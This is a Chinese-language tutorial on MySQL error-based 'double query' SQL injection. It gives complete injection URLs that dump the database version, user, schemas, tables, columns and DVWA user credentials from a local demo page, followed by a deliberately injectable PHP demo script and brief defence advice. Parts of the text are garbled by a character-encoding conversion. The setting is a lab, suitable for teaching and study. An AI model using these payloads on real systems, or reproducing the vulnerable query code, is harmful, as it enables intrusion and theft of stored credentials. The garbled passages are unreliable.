數(shù)據(jù)安全之雙查詢注入解析
介紹一下雙查詢注入,什么叫雙查詢注入,這個有點(diǎn)難以解釋,通俗的來說就是嵌套子查詢。我們理解一下子查詢,查詢的關(guān)鍵字是select,這個大家都知道。子查詢可以簡單的理解在一個select語句里還有一個select,里面的這個select語句就是子查詢。
這種方法適用于注入的時候沒有返回位,但是有返回位的時候也適用,不過又返回位的時候就不建議在、用這個啦!返回位就是你們union select 1,2,3,4,5,6,7,8 這里是8個字段
這里顯示2,4,5,6,7,8就是返回位
另外,就是要有返回mysql錯誤提示,php返回錯誤提示有兩種,看下圖
這是mysql返回的錯誤
這是php返回的錯誤
雙注入的原理,簡單一句話原理就是有研究人員發(fā)現(xiàn),當(dāng)在一個聚合函數(shù),比如count函數(shù)后面如果使用分組語句就會把查詢的一部分以錯誤的形式顯示出來。
floor()和rand(),count()就不在多說啦
但是concat()函數(shù),就來說一下,concat是一個連接函數(shù),可以連接多個字符,例如
1concat("abc","123")="abc123"
并且支持ascii碼,例如:
1concat("abc",0x22,"123")=abc"123
(0×22就是雙引號,可以用來當(dāng)分隔符)
這里在mysql輸入
1select concat((select version()))
在concat里執(zhí)行查詢要用括號括起來,同時要確定只返回 一條數(shù)據(jù),不然得用limit來保證只有一條結(jié)果 (limit 0,1 返回第一條)
如果這條語句添加from的話,就會返回表中的記錄的條數(shù),就是有多少條記錄就會返回多少次的版本號,看圖
這里還沒有顯示完!!
因此
1select concat((select version()),floor(rand()*2)) from mysql.user;
(這里我用的是mysql中的mysql數(shù)據(jù)庫,user表有四條記錄 )
(小編注:rand()函數(shù)是生成0-1之間的小數(shù)隨機(jī)值,rand()*2是生成0-2之間的小數(shù)隨機(jī)數(shù),floor(rand()*2)就相當(dāng)于生成0/1兩個隨機(jī)值)
Attention,這里顯示的值是版本號加上rand()生成的,正確版本好是去掉后面的0或1
現(xiàn)在我們加上group by ,因?yàn)槿绻覀儚膄rom 某張表的話,可能里面就會有很多條記錄,然后就可能生成隨機(jī)值(據(jù)說是這樣的,如果不是,還望告知)
這里用information_schema.tables來弄,因?yàn)樗挠涗泬蚨?,如前一條語句,你就可以知道啦
group by 一下多清爽啦
看語句中
1select concat((select version()),floor(rand()*2))a from information_schema.tables group by a;
這里加粗的a是把 as a 簡寫成 a 而已,說一下group by ,這個的作用就是把5.1.69-0ubuntu0.10.04.10 分為一組,5.1.69-0ubuntu0.10.04.11 的分為一組
(小編注:如果各位看官不知道這里是怎么回事,執(zhí)行一下
1select concat((select version()),floor(rand()*2)) from information_schema.tables
就清楚了)
最后就來到這個count()函數(shù)了,這個函數(shù)妙用可以看一下下圖
1select count(*),concat((select version()),floor(rand()*2))a from information_schema.tables group by a
看到了沒有,返回了我們后面concat的內(nèi)容啦
ERROR 1062 (23000): Duplicate entry ’15.1.69-0ubuntu0.10.04.1′ for key ‘group_key’,我們看看phpmyadmin下比較詳細(xì)的報錯:
說了這么多就為了這個而已!!
好了,給個小小demo(demo在本文最后)給你們,不過弄不出一個沒有顯示返回位的,所以就將就一下的
然后雙注入查詢是有固定公式的
1union select 1 from (select+count(*),concat(floor(rand(0)*2),( 注入爆數(shù)據(jù)語句))a from information_schema.tables group by a)b
這里將下面的demo設(shè)置數(shù)據(jù)庫的一些參數(shù)之后,保存成yi.php,我們的演示就正式開始了
這是正常的情況:
加個單引號后
這里說明有注入了,然后用order by 判斷字段咯,這里就截圖了(太麻煩啦),字段數(shù)是8個(其實(shí)不判斷也可以的,只要確定有注入就行啦)
1、先讀個數(shù)據(jù)庫的版本、用戶、當(dāng)前庫名
1http://127.0.0.1/yi.php?id=-1 union select 1 from (select count(*), concat(floor(rand()*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b
這里數(shù)據(jù)庫版本:5.1.28-rc-community
用戶是:root@localhost
數(shù)據(jù)庫名:test
2、然后讀數(shù)據(jù)庫有哪些庫
1http://127.0.0.1/yi.php?id=-1 union select 1 from (select count(*), concat(floor(rand()*2),(select schema_name from information_schema.schemata limit 0,1))a from information_schema.tables group by a)b
這里要注意,因?yàn)閟ql語句會返回多條記錄,所以要用limit來限制返回的條數(shù),limit 0,1是第一條記錄
limit 1,1是第二條記錄
(小編注:通過控制limit來逐條查看數(shù)據(jù)庫名稱,請忽略前面的0或是1)
3、然后看看有什么表
因?yàn)槲矣袀€dvwa的數(shù)據(jù)庫,所以就用那個來做示范啦
1http://127.0.0.1/yi.php?id=-1 union select 1 from (select+count(*),concat(floor(rand(0)*2),(select table_name from information_schema.tables where table_schema=0x64767761 limit 1,1))a from information_schema.tables group by a)b
加粗是dvwa的hex值,這樣得到dvwa的users的表
4、然后看有什么字段
1http://127.0.0.1/yi.php?id=-1 union select 1 from (select count(*) ,concat(floor(rand(0)*2),(select column_name from information_schema.columns where table_name =0x7573657273 limit 0,1 ))a from information_schema.tables group by a)b
然后修改limit的值,得到字段user,password
5、然后讀取字段的值
1http://127.0.0.1/yi.php?id=-1 union Select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user,0x22,password) from dvwa.users limit 0,1))a from information_schema.tables group by a)b
這樣子就得到字段的值啦,然后提醒一下,要是跨庫讀取數(shù)據(jù),要寫成數(shù)據(jù)庫名然后.表名。因?yàn)楫?dāng)前數(shù)據(jù)庫是test,然后我讀的是dvwa庫的users的表,所以要寫成dvwa.users
好了基本就是這么多啦。
防范辦法:
一個是過濾啦(把’,”,union,select load_file,%,and等敏感字符都過濾啦)
另一個是參數(shù)化查詢,就是一種把查詢語句給固定死了,無論傳過來的值是什么,都只當(dāng)做變量來執(zhí)行查詢語句
demo的源碼:
- <?php
- $dbuser = "root";
- $dbpwd = ""; //這里是mysql的密碼
- $db = "test";
- $conn = mysql_connect("localhost",$dbuser,$dbpwd) or die("error");
- mysql_select_db($db,$conn);
- $id = $_GET['id'];
- $query = "select * from test where id =$id";
- $result = mysql_query($query) or die(mysql_error());
- print_r(mysql_fetch_array($result));
- //簡單的寫一下而已
- ?>
[via@廣外(廣東外語外貿(mào)大學(xué))網(wǎng)絡(luò)安全小組_臺灣鴿]
